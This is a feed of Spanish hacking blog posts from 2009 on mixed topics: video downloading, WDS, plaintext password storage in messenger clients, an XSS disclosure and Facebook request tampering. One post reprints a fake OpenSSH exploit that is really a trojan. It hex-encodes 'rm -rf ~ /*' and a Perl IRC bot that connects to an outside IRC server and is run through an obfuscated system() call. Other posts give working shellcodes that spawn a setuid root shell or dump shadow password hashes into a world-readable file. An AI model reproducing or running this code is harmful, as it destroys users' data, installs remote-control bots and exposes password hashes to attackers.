~Unix & Cisco & Hacks~

Descargar videos de RTVE

noreply@blogger.com (vlan7) — Fri, 25 Dec 2009 18:37:00 +0000

Hoy me hizo una visita de Navidad mi tio, y me comento que no le funcionaban muy bien los programas que el usaba para bajar videos, concretamente de RTVE.

Me comento que el pedia bajar un video, y que el programa le bajaba otro.

Le dije que me lo miraria, y ahora despues de la despedida y de la siesta, este es el procedimiento que he encontrado. Es un poco manual, pero no necesitamos instalar ningun programa.

1.- Entrar en RTVE Alacarta

2.- Boton derecho sobre el titulo del video deseado / Abrir en nueva pestaña

Yo he escogido como ejemplo el mensaje navideño del Rey para hacer la prueba. Vemos en la direccion del navegador:

http://www.rtve.es/alacarta/player/656335.html

3.- Sustituir el html subrayado por xml. La direccion resultante quedaria asi:

http://www.rtve.es/alacarta/player/656335.xml

Pulsar Intro.

4.- Nos aparecen un monton de lineas. No te preocupes tio, fijate en la encerrada entre <location> y </location>. En nuestro ejemplo del mensaje navideño del Rey:

<location>rtmp://stream.rtve.es/stream/resources/alacarta/flv/3/6/1261688753463.flv</location>

5.- Vamos a eliminar lo que no nos interesa de esa linea tio, no me refiero a editar el XML, sino a copiar la direccion, pegarla en la barra de navegacion, eliminar lo que no queremos y...

~~<location>rtmp://stream.~~rtve.es~~/stream~~/resources/alacarta/flv/3/6/1261688753463.flv~~</location>~~

6.- Nos queda entonces la siguiente direccion en la barra de navegacion:

rtve.es/resources/alacarta/flv/3/6/1261688753463.flv

7.- Intro y a guardar al disco duro.

Como reproductor de videos, te recomiendo el Videolan, pues aparte de ser 100% libre y gratuito para descargar desde su pagina web http://www.videolan.org/vlc/, incorpora practicamente todos los codecs necesarios para poder reproducir todo tipo de formatos de video, ya esten comprimidos con DiVX, XviD, etc, o simplemente archivos FLV como es nuestro caso.

Bajate los binarios para Windows, e instalalo segun el procedimiento habitual, siguiente-siguiente-siguiente-...-finalizar.

Para otro tipo de paginas de videos puedes usar http://www.atrapavideo.com. Hablan bastante bien de ella...

Y si tienes algun problema, comentario al canto o telefonazo.

Suerte, y felices fiestas a todos.

Conversores de varios formatos online

noreply@blogger.com (vlan7) — Thu, 24 Dec 2009 11:35:00 +0000

Suelen funcionar especificando un archivo/URL y un mail, a donde nos llega un enlace para descargar el archivo convertido.

A mi me resultan muy utiles, ya que prefiero siempre instalar el menor numero de programas posibles...

http://www.zamzar.com/

http://www.youconvertit.com/

http://www.convertfiles.com/

Suerte,

Sobre certificados, CAs, SSL y demas

noreply@blogger.com (vlan7) — Sat, 19 Dec 2009 16:53:00 +0000

En Wadalbertia estamos discutiendo, en el sentido correcto de la palabra claro, sobre todos estos temas en este hilo.

Lo enlazo porque me parece bastante interesante.

Suerte,

"Hackeando" aplicaciones de Facebook

noreply@blogger.com (vlan7) — Thu, 10 Dec 2009 01:02:00 +0000

Como consegui ser el mas inteligente en Brain Buddies de Facebook sin jugar ni una partida. Jugar de forma normal y aburrida claro ;)

Bueno, decir que no es ninguna proeza...

Basicamente lo que hice fue poner un proxy local en mi maquina, en mi caso Paros, que se que hace años que no se actualiza, pero es con el que me siento mas comodo.

Luego apuntar el navegador a 127.0.0.1 hacia el puerto en que paros estaba escuchando en mi maquina, y poner a Paros en modo "trap request/response", que por defecto no lo hace.

Entonces con un poco de paciencia di con el paquete que contenia el mensaje, y lo modifique a mi antojo, eso si, respetando la codificacion (espacio=%20 , etc).

Y mas tarde di con el paquete que contenia el servidor (externo en el caso de este juego) con la imagen con un nombre tal que porcentaje00.jpg.

Intuitivamente trate de buscar la imagen porcentaje100.jpg pero no existia en ese directorio, probe con porcentaje99.jpg y bingo!

Lo que pasa es que ciertas aplicaciones, en un campo de las cabeceras http incluyen un "flag" que les permite averiguar si el contenido ha sido modificado.

Anulando ese "flag" y un par de variables mas, logre ese pequeño "hack".

Ah, ni idea del codigo de la aplicacion, solo estudie como se comportaba el juego a nivel de paquetes enviados y recibidos.

Suerte,

Wireless Distribution System (WDS)

noreply@blogger.com (vlan7) — Thu, 03 Dec 2009 03:25:00 +0000

Se que esto es algo basico, pero me lo apunto para tenerlo en cuenta en el futuro.

Para distribuir la señal entre varios APs a lo largo de un edificio, quizas lo ideal seria usar WDS, que lo que permite basicamente es la interconexion de varios APs que actuarian en "modo repetidor" de la señal entre ellos.

Basicamente se tienen que cumplir las siguientes condiciones:

1. Todos los APs tienen que operar en el mismo canal
2. El ESSID de cada uno debe ser distinto, con el fin de que cada equipo sepa en cada momento a que AP esta asociado.
3. En cuanto a la seguridad, puedes usar WEP/WPA y filtrado por MAC sin problemas.
4. Cada AP se comunica mediante los demas por los BSSIDs (direcciones MAC) de los demas APs, por lo que de alguna manera hay que especificarlo en cada uno

Estos 4 puntos deben cumplirse siempre para un correcto funcionamiento de WDS.

Una vez implementado WDS, el proceso de asociacion de una maquina a un determinado AP es totalmente transparente para el usuario, solo hay que realizar cambios en los APs.

En IRC se envian las credenciales en texto plano

noreply@blogger.com (vlan7) — Sun, 29 Nov 2009 15:38:00 +0000

Por eso muchos clientes de IRC que ofrecen la posibilidad de recordar contraseñas cifran o codifican la contraseña recordada en algun fichero.

Aqui una captura, editada, pues la tengo de hace tiempo en unas pruebas que estuve haciendo, y la verdad es que no me apetece mucho volver a poner el sniffer a correr con otras credenciales... sorry

<EDIT>
Tiene razon anonimo, tendria que haber especificado redes de IRC. Aunque lo cierto es que solo he usado el irc-hispano, y decir que en el momento de jugar con wireshark para win en su dia, las credenciales se enviaban a traves de la red en texto plano.

Lo dicho, que no tengo experiencia con otras redes de IRC, sorry...

Ah, y gracias por comentar en el blog :)
</EDIT>

Suerte,

Nueva "version" de Google

noreply@blogger.com (vlan7) — Fri, 27 Nov 2009 21:53:00 +0000

Via NewLog de Wadalbertia, me entero de que los de Google estan que no paran, ademas del interesante nuevo protocolo SPDY (sobre el que hablamos aqui), estan preparando una nueva "version" de su buscador.

Aun no es oficial, sin embargo, con algun que otro hack podemos acceder e ir probando como sera proximamente el buscador.

Suerte,

Recogiendo datos para Analisis Forense de sistemas Windows

noreply@blogger.com (vlan7) — Sun, 22 Nov 2009 18:41:00 +0000

Estoy escribiendo en este hilo de Wadalbertia un "paper" por llamarlo de alguna forma sobre la obtencion de datos para Analisis Forense en sistemas Windows.

Estoy procurando ser lo mas metodico posible, y aun no lo he terminado, de todas formas se acepta cualquier tipo de critica, comentario o sugerencia.

<EDIT>
Agradecer a quien haya puesto un post-it al documento, lo cual me ha permitido dedicarselo a mi padre :)
</EDIT>

Suerte,

FAKE 0day OpenSSH <= 5.2 Remote root exploit

noreply@blogger.com (vlan7) — Mon, 21 Sep 2009 23:59:00 +0000

En una entrada, admin me preguntaba si conocia un supuesto 0-day de ssh.

Se ha quitado algo para que no compile. ¿Te refieres a este?

Ver los comentarios antes de ejecutar el exploit

* ---------------------------
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";

char fbsd_shellcode[] =
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
"\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
"\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");
printf(" Usage: %s -h -p port\n",arg);
printf(" Options:\n");
printf(" \t-h ip/host of target\n");
printf(" \t-p port\n");
printf(" \t-d username\n");
printf(" \t-B memory_limit 8/16/64\n\n\n");
}

#define FD 0x080518fc
#define BD 0x08082000

int main(int argc, char **argv){
FILE *jmpinst;
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
int port=23, limit=8, target=0, sock;
struct hostent *host;
struct sockaddr_in addr;

if (geteuid()) {
puts("need root for raw socket, etc...");
return 1;
}

if(argc < 3){
usage(argv[0]);
return 1;
}

printf("\n [+] 0wn0wn - by anti-sec group\n");

if (!inet_aton(h, &addr.sin_addr)){
host = gethostbyname(h);
if (!host){
printf(" [-] Resolving failed\n");
return 1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}

sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf(" [-] Connecting failed\n");
return 1;
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,"w+");
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,"%s",shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
}
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
printf(" [-] connecting failed\n");
}

payload[sizeof(payload)-1] = '\0';
payload[sizeof(payload)-2] = '\0';
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
/* v--- our cool bar that says: "r0000000t!!!" */
printf("\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");
fremote("PS1='sh-3.2#' /bin/sh");
}
else
printf(" [-] failed to exploit target :-(\n");
close(sock);
return 0;
}

Husmeando en archivos (IV)

noreply@blogger.com (vlan7) — Mon, 21 Sep 2009 23:23:00 +0000

pidgin, conocido cliente de messenger para Linux, guarda las contraseñas en texto plano tambien.

Dentro de nuestro home, hacemos una busqueda por el archivo accounts.xml.

Lamentable.

Husmeando en archivos (III) ...cypher will not save you

noreply@blogger.com (vlan7) — Mon, 21 Sep 2009 23:14:00 +0000

amsn cifra la contraseña.

El archivo donde la guarda cifrada es:

/home/user/.amsn/config.xml

La variable es remotepassword.

Aunque este cifrada, que me consta que es en DES, bastaria que un atacante copiara ese config.xml en su maquina.

Husmeando en archivos (II)... Kmess guarda user/pass en texto plano

noreply@blogger.com (vlan7) — Mon, 21 Sep 2009 23:09:00 +0000

Este cliente de messenger para Linux, guarda user/pass en un archivo en el que tiene acceso de lectura todo el mundo:

/home/user/.kde/share/config/kmessrc

amsn, mas conocido, guarda esta informacion cifrada.

mmm ... creo que esta es tu IP publica no?

noreply@blogger.com (vlan7) — Sun, 23 Aug 2009 18:25:00 +0000

http://www.orkspace.net/owned/

:)

Gracias a sparc ;)

...una historia inofensiva pero real ~ XSS en la web de la Guardia Civil ~

noreply@blogger.com (vlan7) — Thu, 09 Jul 2009 19:36:00 +0000

Pues nada, un XSS que descubri el otro dia jugando.

Ahi va:

Full Disclosure 100% DIY (esto es, a mi manera)
donde se habla de una historia
inofensiva pero real
~ XSS en la web de la Guardia Civil ~
Por/By: vlan7 [ http://vlan7.blogspot.com ]
~
Fecha de descubrimiento y contacto con la Guardia Civil: 5-Jul-09
Fecha en la que la Guardia Civil responde confirmándolo: 6-Jul-09
Fecha en la que este XSS queda mitigado: 7-Jul-2009
¿Full Disclosure? released to the public: 10-Jul-2009
~

"No hemos hecho nada del otro mundo, porque vivimos en este"
Eskorbuto

P.D. No es mi especialidad la seguridad web, cualquier correccion sera bienvenida. Gracias.

He añadido un archivo .ZIP con las referencias, que realmente es lo mejor del documento :D Hay alguno bastante bueno.

Referencias

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=56031

unshadow.c shellcode

noreply@blogger.com (vlan7) — Sat, 04 Jul 2009 22:13:00 +0000

Esta shellcode deshabilita el shadowing en un sistema Linux. Todos los passwords de /etc/shadow van a /etc/passwd , legible por todo el mundo :)

#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
"\xb0\x0b" //mov al,0bh
"\x52" //push edx /Termina la cadena con un 0
"\x68\x63\x6f\x6e\x76" //push dword "conv"
"\x68\x70\x77\x75\x6e" //push dword "pwun"
"\x68\x62\x69\x6e\x2f" //push dword "bin/"
"\x68\x73\x72\x2f\x73" //push dword "sr/s"
"\x68\x2f\x2f\x2f\x75" //push dword "///u"
"\x89\xe3" //mov ebx,esp
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h

void main()
{
printf("\n~ This shellcode disables shadowing on a linux system ~"
"\n\n\t ~ Coded by vlan7 ~"
"\n\t ~ http://vlan7.blogspot.com ~"
"\n\n ~ Date: 4/Jul/2009"

"\n\tYou'll have the passwords stored in /etc/passwd."
"\n\tFor undo purposes use the pwconv command."
"\n\t ~ Cheers go to: Wadalbertia"
"\n\t ~ Shellcode Size: %d bytes\n\n",
sizeof(sc)-1);

(*(void (*)()) sc)();
}

Y sigue el culebron... Smallest (27 bytes) GNU/Linux x86 setuid/execve shellcode without NULLs

noreply@blogger.com (vlan7) — Sat, 04 Jul 2009 18:28:00 +0000

Como no sabia que era imposible lo hice

27 bytes!!! :)

#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push/pop!
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) should returns 0 right? ;)
"\xb0\x0b" //mov al,0bh
"\x52" //push edx /Termina la cadena //bin/sh con un 0
"\x68\x6e\x2f\x73\x68" //push dword "hs/n"
"\x68\x2f\x2f\x62\x69" //push dword "ib//"
"\x89\xe3" //mov ebx,edx
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h

int main()
{
printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE "
"WITHOUT NULLS THAT SPAWNS A SHELL"
"\n\nCoded by vlan7"
"\n\t + vlan7[at]bigfoot.com"
"\n\t + http://vlan7.blogspot.com"
"\n\n[+] Date: 4/Jul/2009"
"\n[+] Thanks to: sch3m4"
"\n\n[+] Shellcode Size: %d bytes\n\n",
sizeof(sc)-1);
(*(void (*)()) sc)();
return 0;
}

Voy a citar de aqui el funcionamiento de setuid().

RETURN VALUE

Upon successful completion, 0 shall be returned. Otherwise, -1 shall be returned and errno set to indicate the error.

ERRORS

The setuid() function shall fail, return -1, and set errno to the corresponding value if one or more of the following are true:

Veamos si entramos en alguno de los casos:

[EINVAL]
The value of the uid argument is invalid and not supported by the implementation

No. UID=0 es un UID valido. Es el r00t!

[EPERM]
The process does not have appropriate privileges and uid does not match the real user ID or the saved set-user-ID.

Logicamente, esto ultimo puede pasar en la version a la que se llego anteriormente.

Ah, y aqui el hilo de Wadalbertia:

Smallest GNU/Linux x86 setuid/execve shellcode without NULLs

Stay clean,

XSS

noreply@blogger.com (vlan7) — Sat, 04 Jul 2009 07:26:00 +0000

El otro dia estuve jugando con XSS, y mande algunos a la conocida xssed.com

http://www.xssed.com/archive/author=vlan7/

Quiero dedicar primero muy especialmente este:

http://www.lsi.upc.edu

dedicado, con cariño, a todos los profesores que tuve que aguantar en su dia del departamento de LSI de la FIB de la UPC; por prohibir las soluciones ingeniosas en sus estupidos problemas. Si por ellos fuera nunca aprendo.

Mande varios, pero yo me quedo con ese.

Stay clean,

postfix + logrotate

noreply@blogger.com (vlan7) — Sat, 27 Jun 2009 08:00:00 +0000

LOGUEANDO 2 INSTANCIAS DE POSTFIX EN 2 ARCHIVOS DIFERENTES:
===========================================================

/etc/postfix/main.cf :
----------------------
syslog_facility=local1
